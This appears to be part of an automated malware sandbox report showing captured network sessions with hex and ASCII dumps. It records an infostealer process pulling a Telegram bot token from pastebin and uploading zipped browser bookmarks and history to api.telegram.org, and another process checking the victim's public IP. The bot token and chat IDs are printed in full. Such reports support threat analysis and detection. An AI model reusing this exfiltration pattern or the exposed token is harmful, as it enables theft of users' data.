                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC16355OUTData Raw: ca 06 3d b4 7a 1a b5 6b 5e 95 c8 90 df a0 9e 19 75 da f7 45 ee e5 34 b2 7b 28 ab 4b bc 52 af dc e2 67 6d 47 d5 5c 6f 68 c9 65 4d 6d 38 44 34 46 6a 9b ef 2e 79 7f 5e 29 d9 6d ab 2f d0 c3 99 62 6d 8c 2d d4 ee c5 ab 8f 80 bf 11 30 ae be eb f5 95 a3 28 e3 c8 bb 2b 87 c6 0b 5d f6 c2 91 ed d2 55 1c 57 4f 6b 71 99 c1 56 13 43 30 67 50 af a7 97 7e a7 b7 a9 dd 1c e6 1e 37 03 56 3b a1 49 c7 3c ae b5 7b 16 5d 9f ba dc 12 68 56 2b 1f be 8b bd 94 f5 da 75 c9 d2 53 6f f9 50 1b 1f eb 13 db 43 6e 8f 53 e3 cf 45 a0 80 c2 2e e5 dd 69 3e 9b 85 3a f3 41 83 36 94 7b 8c 31 9c 94 36 70 aa fc fb 22 32 f4 ca a9 9e 0b 2f 91 d1 cf 6b de ab 70 3f 49 6a 44 28 3e 31 aa 05 7d 9d b8 e3 1c fa f7 e7 0f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 50 ad d3 d6 82 02 00 00 02 04 00 00 35 00 00
                                                                                                                                                                                                                                Data Ascii: =zk^uE4{(KRgmG\oheMm8D4Fj.y^)m/bm-0(+]UWOkqVC0gP~7V;I<{]hV+uSoPCnSE.i>:A6{16p"2/kp?IjD(>1}PKQ@DWP5
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC16355OUTData Raw: 67 3a f5 ef 75 12 7f ae e5 9d e7 d0 8a 7c 36 97 e0 11 2c 3f 2e 7a b9 d3 67 f5 b8 b1 fb 6d d6 b7 6f aa c2 26 f9 78 85 e2 3f dc 65 1a 3f 3e b3 68 98 40 00 76 82 ac b7 2e ee f9 0b 48 bb 84 fc a6 6e 7c a3 ff f4 75 90 dd ad 2f 2d ea 46 02 1d 57 0a a1 f0 40 e2 81 20 00 91 41 9f f7 a8 40 c7 66 99 2b 39 7a dc e7 04 6f 42 27 cc fb 47 26 55 e2 f1 91 39 93 30 d0 e3 39 e9 62 77 18 08 80 82 78 ef 6c d3 b2 4d 5f 33 cb 5b 19 e3 26 46 5d cb a8 e2 1f 34 4b 85 6a d2 2b 5a 9f 97 55 7a cc 2c 7f 06 a5 c2 17 ad 09 40 9a 6a 4c 5b db 99 33 56 fe 14 b5 61 6a bc dc e1 ce de b3 9e 63 e9 5d 96 65 5e 2e b2 f1 91 6c 3c 02 74 45 a2 17 2e e8 5f 2a 97 dc 54 3b 9b f8 fb 7b b1 18 9d f4 ec 99 cf 2f 5f 36 8d ae 78 50 88 88 59 7f b1 28 14 51 b2 a6 70 49 1e f6 ea 55 33 be a6 8b 1f 5f d8 10 fc
                                                                                                                                                                                                                                Data Ascii: g:u|6,?.zgmo&x?e?>h@v.Hn|u/-FW@ A@f+9zoB'G&U909bwxlM_3[&F]4Kj+ZUz,@jL[3Vajc]e^.l<tE._*T;{/_6xPY(QpIU3_
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC16355OUTData Raw: 9b 29 7e e9 f0 ea e9 9f 34 d9 e8 0b e0 ce c6 3b 87 87 3a 7e 5d 17 21 75 e8 49 1a 71 1a 8f 94 5d a5 04 c9 93 3f 49 f2 62 83 2f c3 e9 6e a6 41 a5 6c 39 aa f0 f5 f0 cf 3a 09 0e 35 de 73 f6 f1 47 46 17 89 c2 16 c4 93 f8 a1 0b 6f ad e3 9f 26 61 9d e4 d0 67 c9 b4 80 c2 6c 2d ba 5a e6 6d 62 2c 15 70 86 0b 78 9a 17 4b 8e 8b 95 b3 2a d6 bf 94 29 84 4b 69 85 0d b8 8e 3e 8b e4 fa c6 59 a5 6c e6 42 2e 35 bd 0d cc 1e 2b 8b 35 8e 68 6e ad dc 63 a8 bb c1 69 0e eb a1 03 c7 c4 46 88 21 26 e3 7c 97 66 84 b5 46 d7 b3 74 c2 9f 76 5b b4 ce 4f c9 28 95 2a 0d bb 78 7f 0b 08 bb 05 9c 14 88 10 65 55 85 03 9f e0 bf df 50 1a 8b 51 64 ce 80 b0 b9 6b c8 1f 0b cb c6 43 41 52 42 09 22 75 e6 16 21 76 14 87 7b bf 6b e7 87 9c cc 4d 99 6a f1 7c f8 b1 d3 66 37 7d 0b 08 51 cf a8 5d 9f cf 55
                                                                                                                                                                                                                                Data Ascii: )~4;:~]!uIq]?Ib/nAl9:5sGFo&agl-Zmb,pxK*)Ki>YlB.5+5hnciF!&|fFtv[O(*xeUPQdkCARB"u!v{kMj|f7}Q]U
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC16355OUTData Raw: 24 87 50 69 69 a4 a4 53 11 69 a4 4b a4 44 3a 04 a4 7b e6 9d 99 01 7f fe ff f7 ae 7b d7 7a 6f bd fb d6 7a 6b 31 ac 39 73 ce d9 fb c4 de df da 7b 7f 3f 3b 44 35 4b 7a ce ea b0 db df 0b 52 36 75 5f 52 1b e0 ab 0a 1e 68 fb bc 43 bd f3 9d 40 05 97 ff 2a a3 35 fb 5d 64 11 c7 eb 46 08 6f a0 a1 a4 fd 64 22 44 50 98 35 6b b0 3d 16 53 a5 aa 8f 1f 15 9c a1 91 a2 df 92 b3 74 05 c6 54 67 56 1e d8 a5 7d 81 6f 0c 5f c4 db 46 f1 4b 05 fe a8 74 cc 57 e9 aa 2a 46 be b6 0f de 83 6b 81 9d 3a 1f 07 6c 1f 7c a9 ef b3 ec 9c 59 97 23 44 d0 d9 e1 c1 66 c2 3e d5 bd c9 79 ca 67 4e 43 98 24 5f c9 b5 93 96 5c b2 ef 55 54 ea eb 1b e2 53 d6 79 8f 55 79 d3 4d c4 04 99 5c 0d 3a 02 d6 ac 47 3b 1f d0 c0 e7 3a 54 73 51 2d 0c 0d dc 14 40 03 05 8c fb 65 96 ab 75 a8 b9 7c 34 80 2c 4b 9c 52 dd
                                                                                                                                                                                                                                Data Ascii: $PiiSiKD:{{zozk19s{?;D5KzR6u_RhC@*5]dFod"DP5k=StTgV}o_FKtW*Fk:l|Y#Df>ygNC$_\UTSyUyM\:G;:TsQ-@eu|4,KR
                                                                                                                                                                                                                                2024-07-06 11:28:46 UTC16355OUTData Raw: 6a ba 2b fc d7 27 23 34 c0 f8 f5 cb ea 78 78 d4 e1 fe 78 b7 92 6b 96 ed 63 62 a8 7a bd a8 db dd f5 ee f3 76 08 e8 c5 d0 00 be 4b 2a 65 32 f2 c1 66 8a 55 16 36 81 8c 63 0a 40 cc b0 9f ff a8 5d 8f 3b 01 7d a2 fb 4e de 9d 92 3a 61 3b bc ba 97 29 7d 26 3c e9 8f 17 44 27 19 42 2e 66 f9 6f 24 3f 0e 8b 7e 6e 9a af cb e8 e6 2c a7 fd 48 f0 c9 45 85 04 0b e2 fe 00 c8 60 5b a7 bd 1b 81 cd 6d eb 8a 97 4e fc 4d 37 8c e7 8a df b4 2a 1f 7a 10 3c d9 0f c6 23 f5 f7 0f 63 f7 3a cb fd a8 aa 48 bb fa 63 ec 38 61 47 63 fa ef 0b 01 41 32 f6 26 2d 7b 45 48 a7 d6 c5 26 7c 61 3d 9b 36 3a 33 82 ea 1c d7 91 94 04 3b c1 2e e2 9c cf 12 31 8e 43 bf ad 7b 74 f5 6b 2f 79 ee 3a 59 6d bc 25 5c ed 20 fc cc dd 45 1b 24 1a 39 2a b6 a9 35 5d 8a fc a7 24 d6 a3 0c d2 c7 91 61 a1 4e 3a 60 4b c5
                                                                                                                                                                                                                                Data Ascii: j+'#4xxxkcbzvK*e2fU6c@];}N:a;)}&<D'B.fo$?~n,HE`[mNM7*z<#c:Hc8aGcA2&-{EH&|a=6:3;.1C{tk/y:Ym%\ E$9*5]$aN:`K
                                                                                                                                                                                                                                2024-07-06 11:28:47 UTC903INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:47 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 515
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                {"ok":true,"result":{"message_id":26317,"from":{"id":6082381502,"is_bot":true,"first_name":"DiamotrixBotss","username":"DiamotrixBotss_bot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1720265327,"document":{"file_name":"C_UsersuserAppDataLocal9fcfff727395b8d6c60ddb8e64f4c35auser@13.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAJmzWaJKm8e4n3vh2EZZ4p2sskRAAEYKQACIBUAAoC_SVAJNWgVaREBfjUE","file_unique_id":"AgADIBUAAoC_SVA","file_size":137173}}}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                46192.168.2.449903172.67.19.24443420C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:47 UTC74OUTGET /raw/7B75u64B HTTP/1.1
                                                                                                                                                                                                                                Host: pastebin.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:28:48 UTC398INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:48 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                x-frame-options: DENY
                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                x-xss-protection: 1;mode=block
                                                                                                                                                                                                                                cache-control: public, max-age=1801
                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                Age: 1490
                                                                                                                                                                                                                                Last-Modified: Sat, 06 Jul 2024 11:03:58 GMT
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef40dc5acc4388-EWR
                                                                                                                                                                                                                                2024-07-06 11:28:48 UTC52INData Raw: 32 65 0d 0a 35 33 39 30 37 35 37 37 38 38 3a 41 41 46 56 36 35 59 64 75 6e 39 4f 50 34 30 67 37 38 58 78 49 35 65 44 62 56 34 32 4b 71 48 59 35 6d 55 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2e5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU
                                                                                                                                                                                                                                2024-07-06 11:28:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                47192.168.2.449905149.154.167.220443420C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:28:48 UTC254OUTPOST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary="756f27b2-8e1e-41d6-84d0-70bf6be4b848"
                                                                                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                                                                                Content-Length: 137522
                                                                                                                                                                                                                                Expect: 100-continue
                                                                                                                                                                                                                                2024-07-06 11:28:49 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                2024-07-06 11:28:49 UTC40OUTData Raw: 2d 2d 37 35 36 66 32 37 62 32 2d 38 65 31 65 2d 34 31 64 36 2d 38 34 64 30 2d 37 30 62 66 36 62 65 34 62 38 34 38 0d 0a
                                                                                                                                                                                                                                Data Ascii: --756f27b2-8e1e-41d6-84d0-70bf6be4b848
                                                                                                                                                                                                                                2024-07-06 11:28:49 UTC265OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 39 66 63 66 66 66 37 32 37 33 39 35 62 38 64 36 63 36 30 64 64 62 38 65 36 34 66 34 63 33 35 61 5c 6a 6f 6e 65 73 40 31 33 34 33 34 39 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 39 66 63 66 66 66 37 32 37 33 39 35 62 38 64 36 63 36 30 64 64 62 38 65 36 34 66 34 63 33 35 61 25 35 43 6a 6f 6e 65 73 25 34 30 31 33 34 33 34 39 5f 65 6e 2d
                                                                                                                                                                                                                                Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\9fcfff727395b8d6c60ddb8e64f4c35a\user@134349_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C9fcfff727395b8d6c60ddb8e64f4c35a%5Cuser%40134349_en-
                                                                                                                                                                                                                                2024-07-06 11:28:49 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 4f 47 e6 58 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 71 3b e6 58 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 71 3b e6 58 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae
                                                                                                                                                                                                                                Data Ascii: PKOGXBrowsers\Edge\PKq;XQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKq;XceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
                                                                                                                                                                                                                                2024-07-06 11:28:49 UTC16355OUTData Raw: 39 6a e3 ea 08 11 66 35 c1 fa 65 4b 16 6b 8c fb a2 b5 30 b0 df 12 5f c0 a2 aa 67 3d 99 eb a5 b3 56 c8 86 b6 9e 01 fb 0c dd 62 6a a3 34 e7 7c 08 bb 60 1d af 40 f8 2b be fa eb c0 0f eb f0 74 e3 f3 2c de 19 f5 48 7e d6 f4 21 06 57 8c 2a aa 87 58 c6 05 8f 52 af 4c e7 46 b4 5f c0 42 a9 da 35 77 8b 46 18 e7 f5 91 6b 98 06 f7 bd 70 52 90 5e af d3 a4 78 a8 7d 4d 70 45 1b 51 80 6f 45 1a 6f 3b 45 ab d3 f7 f3 ab 7d 58 46 27 ff c9 be 19 16 2c 13 ea 11 5b c8 09 05 3b 52 87 5a 6e ba 69 c6 0e 29 e9 e7 4d 6c a7 76 84 d5 da 43 7c bd 0c b9 e7 f3 08 57 fa 6d 3c 2a 96 18 8f 7b f3 e4 08 84 98 ce 87 9b b1 ba d3 5e d3 b8 98 0a 82 db b9 d4 a7 82 2d 15 05 ce 14 ce 7d ba 3b 93 93 58 df fd d0 eb 51 82 e7 54 de d9 4b e2 6f 13 98 ba 4a cb df da 4a 7b e1 ea 07 5f 3b ad fa fd fd 03 50
                                                                                                                                                                                                                                Data Ascii: 9jf5eKk0_g=Vbj4|`@+t,H~!W*XRLF_B5wFkpR^x}MpEQoEo;E}XF',[;RZni)MlvC|Wm<*{^-};XQTKoJJ{_;P
                                                                                                                                                                                                                                2024-07-06 11:28:49 UTC16355OUTData Raw: c1 2b d3 be ce 64 71 56 ee 17 37 ec 66 7f 6e 3d 2a b4 0a 18 a0 12 53 87 e9 6d af fe 78 d6 dc 68 89 d6 ae 2a 10 a2 7c 5c b1 58 c9 cf 05 7d 9b e1 f2 a7 ac 86 ba 24 0b dc 74 cd b0 e0 d9 2e c7 f5 22 7f 75 04 f2 3b cb 38 25 ec be b0 63 d8 ab 0d 79 fa 30 35 e5 34 ce 9b e7 cc da 5f b8 da 59 2b 51 c9 16 6f 99 58 cf c7 1f 35 ab d0 a5 31 fd ed 89 94 2e 3d 4c 51 c5 98 c5 74 52 7e df 67 18 6b 8b 28 3f fc c1 e0 2c 9e 3a fd 7a a7 d6 e6 3c 74 33 dd ad 9c 73 e5 1d dc a5 77 db 37 14 63 ab 83 6c 2a d5 31 a5 a1 95 20 af 58 b3 75 f1 36 f3 45 9f e2 cd f8 91 ac 76 6e 78 f2 fa 04 ea d9 64 f7 1f 2c 6a 24 c1 22 96 c9 fc 61 e8 31 de f7 33 cd 28 7d 79 9a ef cc 6e 24 55 7a 54 0f 34 44 a8 bf 3f 7f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 59 f1 45 0f 84 02 00 00 02 04 00 00 34 00 00
                                                                                                                                                                                                                                Data Ascii: +dqV7fn=*Smxh*|\X}$t."u;8%cy054_Y+QoX51.=LQtR~gk(?,:z<t3sw7cl*1 Xu6Evnxd,j$"a13(}yn$UzT4D?PKQ@DWYE4
                                                                                                                                                                                                                                2024-07-06 11:28:49 UTC16355OUTData Raw: ca 06 3d b4 7a 1a b5 6b 5e 95 c8 90 df a0 9e 19 75 da f7 45 ee e5 34 b2 7b 28 ab 4b bc 52 af dc e2 67 6d 47 d5 5c 6f 68 c9 65 4d 6d 38 44 34 46 6a 9b ef 2e 79 7f 5e 29 d9 6d ab 2f d0 c3 99 62 6d 8c 2d d4 ee c5 ab 8f 80 bf 11 30 ae be eb f5 95 a3 28 e3 c8 bb 2b 87 c6 0b 5d f6 c2 91 ed d2 55 1c 57 4f 6b 71 99 c1 56 13 43 30 67 50 af a7 97 7e a7 b7 a9 dd 1c e6 1e 37 03 56 3b a1 49 c7 3c ae b5 7b 16 5d 9f ba dc 12 68 56 2b 1f be 8b bd 94 f5 da 75 c9 d2 53 6f f9 50 1b 1f eb 13 db 43 6e 8f 53 e3 cf 45 a0 80 c2 2e e5 dd 69 3e 9b 85 3a f3 41 83 36 94 7b 8c 31 9c 94 36 70 aa fc fb 22 32 f4 ca a9 9e 0b 2f 91 d1 cf 6b de ab 70 3f 49 6a 44 28 3e 31 aa 05 7d 9d b8 e3 1c fa f7 e7 0f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 50 ad d3 d6 82 02 00 00 02 04 00 00 35 00 00
                                                                                                                                                                                                                                Data Ascii: =zk^uE4{(KRgmG\oheMm8D4Fj.y^)m/bm-0(+]UWOkqVC0gP~7V;I<{]hV+uSoPCnSE.i>:A6{16p"2/kp?IjD(>1}PKQ@DWP5
                                                                                                                                                                                                                                2024-07-06 11:28:49 UTC16355OUTData Raw: 67 3a f5 ef 75 12 7f ae e5 9d e7 d0 8a 7c 36 97 e0 11 2c 3f 2e 7a b9 d3 67 f5 b8 b1 fb 6d d6 b7 6f aa c2 26 f9 78 85 e2 3f dc 65 1a 3f 3e b3 68 98 40 00 76 82 ac b7 2e ee f9 0b 48 bb 84 fc a6 6e 7c a3 ff f4 75 90 dd ad 2f 2d ea 46 02 1d 57 0a a1 f0 40 e2 81 20 00 91 41 9f f7 a8 40 c7 66 99 2b 39 7a dc e7 04 6f 42 27 cc fb 47 26 55 e2 f1 91 39 93 30 d0 e3 39 e9 62 77 18 08 80 82 78 ef 6c d3 b2 4d 5f 33 cb 5b 19 e3 26 46 5d cb a8 e2 1f 34 4b 85 6a d2 2b 5a 9f 97 55 7a cc 2c 7f 06 a5 c2 17 ad 09 40 9a 6a 4c 5b db 99 33 56 fe 14 b5 61 6a bc dc e1 ce de b3 9e 63 e9 5d 96 65 5e 2e b2 f1 91 6c 3c 02 74 45 a2 17 2e e8 5f 2a 97 dc 54 3b 9b f8 fb 7b b1 18 9d f4 ec 99 cf 2f 5f 36 8d ae 78 50 88 88 59 7f b1 28 14 51 b2 a6 70 49 1e f6 ea 55 33 be a6 8b 1f 5f d8 10 fc
                                                                                                                                                                                                                                Data Ascii: g:u|6,?.zgmo&x?e?>h@v.Hn|u/-FW@ A@f+9zoB'G&U909bwxlM_3[&F]4Kj+ZUz,@jL[3Vajc]e^.l<tE._*T;{/_6xPY(QpIU3_
                                                                                                                                                                                                                                2024-07-06 11:28:49 UTC16355OUTData Raw: 9b 29 7e e9 f0 ea e9 9f 34 d9 e8 0b e0 ce c6 3b 87 87 3a 7e 5d 17 21 75 e8 49 1a 71 1a 8f 94 5d a5 04 c9 93 3f 49 f2 62 83 2f c3 e9 6e a6 41 a5 6c 39 aa f0 f5 f0 cf 3a 09 0e 35 de 73 f6 f1 47 46 17 89 c2 16 c4 93 f8 a1 0b 6f ad e3 9f 26 61 9d e4 d0 67 c9 b4 80 c2 6c 2d ba 5a e6 6d 62 2c 15 70 86 0b 78 9a 17 4b 8e 8b 95 b3 2a d6 bf 94 29 84 4b 69 85 0d b8 8e 3e 8b e4 fa c6 59 a5 6c e6 42 2e 35 bd 0d cc 1e 2b 8b 35 8e 68 6e ad dc 63 a8 bb c1 69 0e eb a1 03 c7 c4 46 88 21 26 e3 7c 97 66 84 b5 46 d7 b3 74 c2 9f 76 5b b4 ce 4f c9 28 95 2a 0d bb 78 7f 0b 08 bb 05 9c 14 88 10 65 55 85 03 9f e0 bf df 50 1a 8b 51 64 ce 80 b0 b9 6b c8 1f 0b cb c6 43 41 52 42 09 22 75 e6 16 21 76 14 87 7b bf 6b e7 87 9c cc 4d 99 6a f1 7c f8 b1 d3 66 37 7d 0b 08 51 cf a8 5d 9f cf 55
                                                                                                                                                                                                                                Data Ascii: )~4;:~]!uIq]?Ib/nAl9:5sGFo&agl-Zmb,pxK*)Ki>YlB.5+5hnciF!&|fFtv[O(*xeUPQdkCARB"u!v{kMj|f7}Q]U
                                                                                                                                                                                                                                2024-07-06 11:28:49 UTC16355OUTData Raw: 24 87 50 69 69 a4 a4 53 11 69 a4 4b a4 44 3a 04 a4 7b e6 9d 99 01 7f fe ff f7 ae 7b d7 7a 6f bd fb d6 7a 6b 31 ac 39 73 ce d9 fb c4 de df da 7b 7f 3f 3b 44 35 4b 7a ce ea b0 db df 0b 52 36 75 5f 52 1b e0 ab 0a 1e 68 fb bc 43 bd f3 9d 40 05 97 ff 2a a3 35 fb 5d 64 11 c7 eb 46 08 6f a0 a1 a4 fd 64 22 44 50 98 35 6b b0 3d 16 53 a5 aa 8f 1f 15 9c a1 91 a2 df 92 b3 74 05 c6 54 67 56 1e d8 a5 7d 81 6f 0c 5f c4 db 46 f1 4b 05 fe a8 74 cc 57 e9 aa 2a 46 be b6 0f de 83 6b 81 9d 3a 1f 07 6c 1f 7c a9 ef b3 ec 9c 59 97 23 44 d0 d9 e1 c1 66 c2 3e d5 bd c9 79 ca 67 4e 43 98 24 5f c9 b5 93 96 5c b2 ef 55 54 ea eb 1b e2 53 d6 79 8f 55 79 d3 4d c4 04 99 5c 0d 3a 02 d6 ac 47 3b 1f d0 c0 e7 3a 54 73 51 2d 0c 0d dc 14 40 03 05 8c fb 65 96 ab 75 a8 b9 7c 34 80 2c 4b 9c 52 dd
                                                                                                                                                                                                                                Data Ascii: $PiiSiKD:{{zozk19s{?;D5KzR6u_RhC@*5]dFod"DP5k=StTgV}o_FKtW*Fk:l|Y#Df>ygNC$_\UTSyUyM\:G;:TsQ-@eu|4,KR
                                                                                                                                                                                                                                2024-07-06 11:28:49 UTC16355OUTData Raw: 6a ba 2b fc d7 27 23 34 c0 f8 f5 cb ea 78 78 d4 e1 fe 78 b7 92 6b 96 ed 63 62 a8 7a bd a8 db dd f5 ee f3 76 08 e8 c5 d0 00 be 4b 2a 65 32 f2 c1 66 8a 55 16 36 81 8c 63 0a 40 cc b0 9f ff a8 5d 8f 3b 01 7d a2 fb 4e de 9d 92 3a 61 3b bc ba 97 29 7d 26 3c e9 8f 17 44 27 19 42 2e 66 f9 6f 24 3f 0e 8b 7e 6e 9a af cb e8 e6 2c a7 fd 48 f0 c9 45 85 04 0b e2 fe 00 c8 60 5b a7 bd 1b 81 cd 6d eb 8a 97 4e fc 4d 37 8c e7 8a df b4 2a 1f 7a 10 3c d9 0f c6 23 f5 f7 0f 63 f7 3a cb fd a8 aa 48 bb fa 63 ec 38 61 47 63 fa ef 0b 01 41 32 f6 26 2d 7b 45 48 a7 d6 c5 26 7c 61 3d 9b 36 3a 33 82 ea 1c d7 91 94 04 3b c1 2e e2 9c cf 12 31 8e 43 bf ad 7b 74 f5 6b 2f 79 ee 3a 59 6d bc 25 5c ed 20 fc cc dd 45 1b 24 1a 39 2a b6 a9 35 5d 8a fc a7 24 d6 a3 0c d2 c7 91 61 a1 4e 3a 60 4b c5
                                                                                                                                                                                                                                Data Ascii: j+'#4xxxkcbzvK*e2fU6c@];}N:a;)}&<D'B.fo$?~n,HE`[mNM7*z<#c:Hc8aGcA2&-{EH&|a=6:3;.1C{tk/y:Ym%\ E$9*5]$aN:`K
                                                                                                                                                                                                                                2024-07-06 11:28:49 UTC405INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:28:49 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 58
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                48192.168.2.449926104.26.13.2054435184C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:29:02 UTC63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:29:02 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:02 GMT
                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4136e92b4373-EWR
                                                                                                                                                                                                                                2024-07-06 11:29:02 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                49192.168.2.449931104.26.13.205443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:29:04 UTC63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:29:04 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:04 GMT
                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef4142fca64366-EWR
                                                                                                                                                                                                                                2024-07-06 11:29:04 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                50192.168.2.449937104.26.13.205443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-07-06 11:29:06 UTC63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-07-06 11:29:06 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:29:06 GMT
                                                                                                                                                                                                                                Content-Type: text/plain
